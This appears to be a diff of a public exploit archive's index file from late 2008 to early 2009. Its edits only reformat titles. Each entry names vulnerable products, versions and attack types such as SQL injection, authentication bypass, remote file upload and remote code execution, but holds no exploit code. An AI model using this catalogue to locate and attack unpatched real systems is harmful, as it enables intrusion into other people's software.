Raff",windows,remote,0 +6880,platforms/windows/remote/6880.html,"Opera 9.61 - opera:historysearch Code Execution Exploit PoC",2008-10-30,"Aviv Raff",windows,remote,0 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 @@ -6490,7 +6490,7 @@ id,file,description,date,author,platform,type,port 6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - (directory.php cat) SQL Injection",2008-11-01,Hakxer,php,webapps,0 6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - (id) SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 -6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server Response Remote Crash PoC",2008-11-01,DeltahackingTEAM,windows,dos,0 +6926,platforms/windows/dos/6926.pl,"FTP Now 2.6 Server - Response Remote Crash PoC",2008-11-01,DeltahackingTEAM,windows,dos,0 6927,platforms/php/webapps/6927.txt,"AJ ARTICLE - (featured_article.php mode) SQL Injection",2008-11-01,Mr.SQL,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Article Publisher PRO 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 @@ -6562,7 +6562,7 @@ id,file,description,date,author,platform,type,port 6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal - (Tour.php id) SQL Injection",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 6999,platforms/php/webapps/6999.txt,"pre multi-vendor shopping malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 -7000,platforms/php/webapps/7000.txt,"Pre Classified Listings Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 +7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0 7002,platforms/php/webapps/7002.txt,"Joomla Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - (moreinfo.php pg) SQL Injection",2008-11-05,G4N0K,php,webapps,0 @@ -6640,15 +6640,15 @@ id,file,description,date,author,platform,type,port 7078,platforms/php/webapps/7078.txt,"Joomla Component JooBlog 0.1.1 - (PostID) SQL Injection",2008-11-10,boom3rang,php,webapps,0 7079,platforms/php/webapps/7079.txt,"FREEsimplePHPguestbook - (guestbook.php) Remote Code Execution",2008-11-10,GoLd_M,php,webapps,0 7080,platforms/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps,0 -7081,platforms/php/webapps/7081.txt,"AJ ARTICLE Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 -7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 +7081,platforms/php/webapps/7081.txt,"AJ ARTICLE - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps,0 +7082,platforms/php/webapps/7082.txt,"PHPStore Car Dealers - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 7083,platforms/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 7084,platforms/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - File Upload",2008-11-10,ZoRLu,php,webapps,0 -7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 +7085,platforms/php/webapps/7085.txt,"PHPStore Real Estate - Remote File Upload",2008-11-10,ZoRLu,php,webapps,0 7086,platforms/php/webapps/7086.txt,"AJSquare Free Polling Script - (DB) Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps,0 7087,platforms/php/webapps/7087.txt,"AJ Auction Authentication - Bypass",2008-11-10,G4N0K,php,webapps,0 7088,platforms/osx/dos/7088.txt,"smcFanControl 2.1.2 - Multiple Buffer Overflow Vulnerabilities PoC (OSX)",2008-11-11,xwings,osx,dos,0 -7089,platforms/php/webapps/7089.txt,"Aj Classifieds Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 +7089,platforms/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps,0 7090,platforms/windows/dos/7090.txt,"ooVoo 1.7.1.35 - (URL Protocol) Remote Unicode Buffer Overflow PoC",2008-11-11,Nine:Situations:Group,windows,dos,0 7091,platforms/linux/dos/7091.c,"Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit",2008-11-11,"Andrea Bittau",linux,dos,0 7092,platforms/php/webapps/7092.txt,"Joomla Component com_books - (book_id) SQL Injection",2008-11-11,boom3rang,php,webapps,0 @@ -6659,13 +6659,13 @@ id,file,description,date,author,platform,type,port 7097,platforms/php/webapps/7097.txt,"Joomla Component com_marketplace 1.2.1 - (catid) SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - (cid) SQL Injection",2008-11-11,"Hussin X",php,webapps,0 7099,platforms/windows/dos/7099.pl,"Castle Rock Computing SNMPc < 7.1.1 - (Community) Remote BoF PoC",2008-11-12,"Praveen Darshanam",windows,dos,0 -7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module Buffer Overflow PoC",2008-11-12,"Praveen Darshanam",linux,dos,0 +7100,platforms/linux/dos/7100.pl,"Net-SNMP 5.1.4/5.2.4/5.4.1 Perl Module - Buffer Overflow PoC",2008-11-12,"Praveen Darshanam",linux,dos,0 7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro - Remote File Upload",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory - (Auth Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0 7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 7105,platforms/php/webapps/7105.txt,"Quick Poll Script - (code.php id) SQL Injection",2008-11-12,"Hussin X",php,webapps,0 -7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass",2008-11-12,G4N0K,php,webapps,0 +7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds - Auth Bypass",2008-11-12,G4N0K,php,webapps,0 7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 7109,platforms/windows/dos/7109.txt,"Pi3Web 2.0.3 - (ISAPI) Remote Denial of Service",2008-11-13,"Hamid Ebadi",windows,dos,0 7110,platforms/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - File Upload",2008-11-13,ZoRLu,php,webapps,0 @@ -6737,11 +6737,11 @@ id,file,description,date,author,platform,type,port 7182,platforms/php/webapps/7182.txt,"Joomla Component Thyme 1.0 - (event) SQL Injection",2008-11-21,"Ded MustD!e",php,webapps,0 7183,platforms/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote,0 7184,platforms/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - (product) SQL Injection",2008-11-22,NoGe,php,webapps,0 -7185,platforms/php/webapps/7185.php,"Discuz! Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 +7185,platforms/php/webapps/7185.php,"Discuz! - Remote Reset User Password Exploit",2008-11-22,80vul,php,webapps,0 7186,platforms/php/webapps/7186.txt,"Vlog System 1.1 - (blog.php user) SQL Injection",2008-11-22,Mr.SQL,php,webapps,0 -7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 -7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 -7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 +7188,platforms/php/webapps/7188.txt,"getaphpsite Real Estate - Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 +7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Remote File Upload",2008-11-22,ZoRLu,php,webapps,0 +7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password Exploit",2008-11-22,cOndemned,php,webapps,0 7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - (id) SQL Injection",2008-11-23,snakespc,php,webapps,0 7196,platforms/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting PoC (MS08-069)",2008-11-23,"Jerome Athias",windows,remote,0 @@ -6773,7 +6773,7 @@ id,file,description,date,author,platform,type,port 7223,platforms/php/webapps/7223.txt,"WebStudio eCatalogue - (pageid) Blind SQL Injection",2008-11-25,"Hussin X",php,webapps,0 7224,platforms/php/webapps/7224.txt,"FAQ Manager 1.2 - (categorie.php cat_id) SQL Injection",2008-11-25,cOndemned,php,webapps,0 7225,platforms/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 -7226,platforms/windows/dos/7226.html,"Google Chrome Browser MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 +7226,platforms/windows/dos/7226.html,"Google Chrome Browser - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 7227,platforms/php/webapps/7227.txt,"chipmunk topsites - (auth bypass/XSS) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7228,platforms/php/webapps/7228.txt,"clean CMS 1.5 - (blind SQL Injection/XSS) Multiple Vulnerabilities",2008-11-25,ZoRLu,php,webapps,0 7229,platforms/php/webapps/7229.txt,"FAQ Manager 1.2 - (config_path) Remote File Inclusion",2008-11-25,ZoRLu,php,webapps,0 @@ -6792,9 +6792,9 @@ id,file,description,date,author,platform,type,port 7242,platforms/php/webapps/7242.txt,"web calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Remote Blind SQL Injection",2008-11-27,Stack,php,webapps,0 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL/XSS/DDV) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0 -7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 -7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 -7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 +7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 +7246,platforms/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 +7247,platforms/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0 7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Auth Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String PoC",2008-11-27,"Alfons Luja",windows,dos,0 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0 @@ -6804,7 +6804,7 @@ id,file,description,date,author,platform,type,port 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Auth Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0 7256,platforms/php/webapps/7256.txt,"Turnkey Arcade Script - (id) SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps,0 -7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro Database Disclosure",2008-11-27,Stack,php,webapps,0 +7258,platforms/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps,0 7259,platforms/asp/webapps/7259.txt,"comersus asp shopping cart - (DD/XSS) Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,asp,webapps,0 7260,platforms/php/webapps/7260.txt,"BaSiC-CMS - (acm2000.mdb) Remote Database Disclosure",2008-11-28,Stack,php,webapps,0 7261,platforms/php/webapps/7261.txt,"Basic PHP CMS - (index.php id) Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 @@ -6902,23 +6902,23 @@ id,file,description,date,author,platform,type,port 7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - (VSPDFEditorX.ocx) Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 -7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 +7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - (xportal.mdb) Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack BoF PoC",2008-12-06,Cnaph,windows,dos,0 7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 -7367,platforms/php/webapps/7367.php,"PayPal eStore Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 +7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit",2008-12-07,DNX,php,webapps,0 7370,platforms/asp/webapps/7370.txt,"NatterChat 1.12 - (natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 -7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 +7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon AdManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - (RFU/DD) Multiple Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - (index.php) Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - (index.php) Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0 -7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 +7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - (index.php) Directory Traversal",2008-12-07,zAx,php,webapps,0 7378,platforms/asp/webapps/7378.txt,"asp talk - (SQL/css) Multiple Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0 7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - (filename) Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 @@ -6929,7 +6929,7 @@ id,file,description,date,author,platform,type,port 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (CSRF) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Remote Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0 -7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router Remote Network Down PoC Exploit",2008-12-08,0in,windows,dos,0 +7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down PoC Exploit",2008-12-08,0in,windows,dos,0 7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - (LFI/RCE) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - (CSRF) Cross-Site Reference Forgery Exploit",2008-12-08,"Michael Brooks",hardware,remote,0 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - (Auth Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 @@ -6960,7 +6960,7 @@ id,file,description,date,author,platform,type,port 7416,platforms/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - (Cookie) Login Bypass",2008-12-11,x0r,php,webapps,0 -7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 +7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - (mycal.mdb) Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (admin req)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - (lang) Local File Inclusion",2008-12-11,x0r,php,webapps,0 @@ -6968,8 +6968,8 @@ id,file,description,date,author,platform,type,port 7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java - (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Remote File Upload",2008-12-11,ahmadbady,php,webapps,0 -7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 -7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 +7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 +7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 7430,platforms/php/webapps/7430.txt,"SUMON 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic - ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 @@ -6979,7 +6979,7 @@ id,file,description,date,author,platform,type,port 7435,platforms/php/webapps/7435.txt,"Social Groupie - (create_album.php) Remote File Upload",2008-12-12,InjEctOr5,php,webapps,0 7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - (SQL/dd) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0 -7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 Database Disclosure",2008-12-12,Dxil,asp,webapps,0 +7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - (id) SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"joomla live chat - (SQL/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 @@ -6993,7 +6993,7 @@ id,file,description,date,author,platform,type,port 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - (CAForum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"php weather 2.2.2 - (LFI/XSS) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 -7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 Univ. Remote BoF Exploit",2008-12-14,SkD,windows,remote,69 +7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote BoF Exploit",2008-12-14,SkD,windows,remote,69 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service",2008-12-14,Adurit-T,linux,dos,0 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - (download.php) Remote",2008-12-14,x0r,php,webapps,0 @@ -7011,7 +7011,7 @@ id,file,description,date,author,platform,type,port 7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow PoC",2008-12-15,webDEViL,multiple,dos,0 7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - (CADirectory.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - (CAFFAPage.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 -7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 +7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - (CAArticles.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - (CARateMySite.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation Exploit",2008-12-15,s4avrd0w,php,webapps,0 @@ -7043,7 +7043,7 @@ id,file,description,date,author,platform,type,port 7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary Remote File Upload",2008-12-17,mNt,php,webapps,0 7501,platforms/windows/local/7501.asp,"Microsoft SQL Server - sp_replwritetovarbin() Heap Overflow Exploit",2008-12-17,"Guido Landi",windows,local,0 7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injection",2008-12-17,Lidloses_Auge,php,webapps,0 -7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0 +7503,platforms/multiple/local/7503.txt,"PHP python extension safe_mode - Bypass Local",2008-12-17,"Amir Salmani",multiple,local,0 7504,platforms/php/webapps/7504.txt,"Joomla Component Tech Article 1.x - (item) SQL Injection",2008-12-17,InjEctOr5,php,webapps,0 7505,platforms/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution Exploit",2008-12-17,e.wiZz!,windows,remote,0 7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0 @@ -7063,7 +7063,7 @@ id,file,description,date,author,platform,type,port 7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service",2008-12-19,"Jon Oberheide",multiple,dos,0 7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 7522,platforms/php/webapps/7522.pl,"MyPBS - (index.php seasonID) SQL Injection",2008-12-19,Piker,php,webapps,0 -7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 +7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - (download.php) File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7525,platforms/php/webapps/7525.txt,"Extract Website - (download.php filename) File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - XSS / Database Disclosure",2008-12-19,Osirys,php,webapps,0 @@ -7094,7 +7094,7 @@ id,file,description,date,author,platform,type,port 7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 7553,platforms/php/webapps/7553.sh,"RoundCube Webmail 0.2b - Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 -7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 +7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 - location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client - (8010/tcp) Remote Denial of Service (Windows/Linux)",2008-12-23,Sha0,multiple,dos,0 7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service",2008-12-23,Evilcry,windows,dos,0 7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - CSRF",2008-12-23,Ausome1,php,webapps,0 @@ -7211,7 +7211,7 @@ id,file,description,date,author,platform,type,port 7671,platforms/windows/local/7671.pl,"VUPlayer 2.49 - (.wax) Local Buffer Overflow Exploit",2009-01-05,Houssamix,windows,local,0 7672,platforms/php/webapps/7672.txt,"phpauctionsystem - (XSS/SQL) Multiple Vulnerabilities",2009-01-05,x0r,php,webapps,0 7673,platforms/multiple/dos/7673.html,"Safari - (Arguments) Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0 -7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 +7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0 